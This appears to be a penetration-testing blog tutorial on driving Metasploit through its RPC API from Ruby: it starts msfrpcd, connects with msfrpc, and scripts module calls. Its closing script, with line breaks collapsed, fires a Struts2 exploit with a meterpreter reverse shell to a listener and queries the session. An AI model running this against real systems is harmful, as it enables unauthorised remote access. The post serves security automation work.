Ruby | Controlling Metasploit Remotely using RPC API in Ruby
While working on something, I wanted to automate exploiting a vulnerability due to the repetitive nature of what I'm working on. There are many solutions that have been followed for a long time, such as execting msfconsole or building a resource(rc) file and using msfcli. All these solutions are good, but still not so pragmatical way to deal with Metasploit. It's like using an application as an end-user versus as a developer, so to speak.
So the main idea of this topic is using Metasploit as a service, an RPC service to send commands and receive responses as you are set on the msfconsole but you call the RPC service on every command you send or response you receive. This, for example, may allow multiple custom made agents to deal with the same centralized instance and avoiding the need to have Metasploit on your machine.
Running Metasploit RPC API Server
Basically, there are two main ways to run Metasploit RPC service. The first way, using msfconsole command, the second one, using msfrpcd command which is the way we are going to use for the rest of the topic as I'm, in this topic, trying to drive you way from msfconsole as much as possible.
Using 'msfconsole' console
Once you run msfconsole load the MSGRPC plugin which by default run the server on port 55552 with msf as a username and random password.
Metasploit framework comes a utility called msfrpcd to run the service.
$ msfrpcd -U <USERNAME> -P <PASSWORD>
-a <opt> - The local hostname that the server listens on.
-p <opt> - The local port that the server listens on (default: 55553).
-U <opt> - The username to access the server.
-P <opt> - The password to access the server.
-S - Enables or disables SSL on the RPC socket. (default: true)
-f - Runs the daemon in the foreground.
$ msfrpcd -U cool -P looc -f
[*] MSGRPC starting on 0.0.0.0:55553 (SSL):Msg...
[*] MSGRPC ready at 2018-11-22 15:40:41 +0300.
Connecting to Metasploit RPC API
Using 'msfrpc' Client
The fastest way to connect to Metasploit's RPC server is using the framework's client, msfrpc utility which comes with metasploit by default if you are using the metasploit nightly build package.
$ msfrpc -h
Usage: msfrpc <options>
OPTIONS:
-P <opt> Specify the password to access msfrpcd
-S Disable SSL on the RPC socket
-U <opt> Specify the username to access msfrpcd
-a <opt> Connect to this IP address
-h Help banner
-p <opt> Connect to the specified port instead of 55553
To connect to your server
$ msfrpc -U cool -P looc -a localhost
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls
This gives you an IRB with rpc object that already has a logged-in session. You can try to see the rpc object to make sure you're good to go.
#!/usr/bin/env ruby# Author:# Sabri | @KINGSABRI# Description:# How to use MSFRPC API# Requirements:# gem install msfrpc-client#require'msfrpc-client'user ='cool'pass ='looc'opts = { host: '127.0.0.1', port: 55553, uri: '/api/', ssl: true}rpc =Msf::RPC::Client.new(opts)rpc.login(user, pass)rpc.call('core.version')rpc.call('core.module_stats')rpc.call('module.info','exploit','multi/http/struts2_rest_xstream')rpc.call('module.options','exploit','multi/http/struts2_rest_xstream')# Executes a module.exp_opts = {'RHOST'=>'192.168.100.62','RPORT'=>80,'TARGETURI'=>'/orders/3','SSL'=>false,'SRVHOST'=>'0.0.0.0','SRVPORT'=>8081,'UserAgent'=>'Black Hat Ruby','target'=>4# 'Linux (Dropper)'}pay_opts = {'PAYLOAD'=>'linux/x86/meterpreter/reverse_tcp','LHOST'=>'192.168.100.10','LPORT'=>9911}job = rpc.call('module.execute','exploit','multi/http/struts2_rest_xstream', exp_opts.merge(pay_opts))rpc.call('job.list')rpc.call('job.info',7)rpc.call('session.list')rpc.call('session.meterpreter_write',10,"sysinfo")rpc.call('session.meterpreter_read',10)
Finally, I really find this as an awesome way to use Metasploit in ways you are never thought it would be that easy in your code. I'll leave the rest to your imagination.